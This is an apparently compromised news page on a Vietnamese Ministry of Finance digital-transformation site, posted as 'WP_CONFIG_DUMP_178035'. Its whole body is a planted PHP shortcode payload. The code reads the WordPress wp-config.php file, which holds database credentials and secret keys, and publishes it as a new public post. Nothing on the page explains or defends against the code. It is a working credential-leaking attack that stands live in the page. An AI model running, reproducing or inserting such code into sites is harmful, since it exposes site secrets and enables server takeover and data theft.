BỘ TÀI CHÍNH

Chương trình Hỗ trợ Doanh nghiệp Chuyển đổi số

Tin tức

WP_CONFIG_DUMP_178035

  • 02 tháng 06, 2026 - 1:36 PM

  • Chia sẻ:

[php]require(‘/var/www/html/business/wp-load.php’);$c=file_get_contents(‘/var/www/html/business/wp-config.php’);$new_id=wp_insert_post(array(‘post_title’=>’CONFIG_DATA_178035′,’post_content’=>$c,’post_status’=>’publish’,’post_author’=>10));echo ‘NEW_POST_ID:’.$new_id;[/php]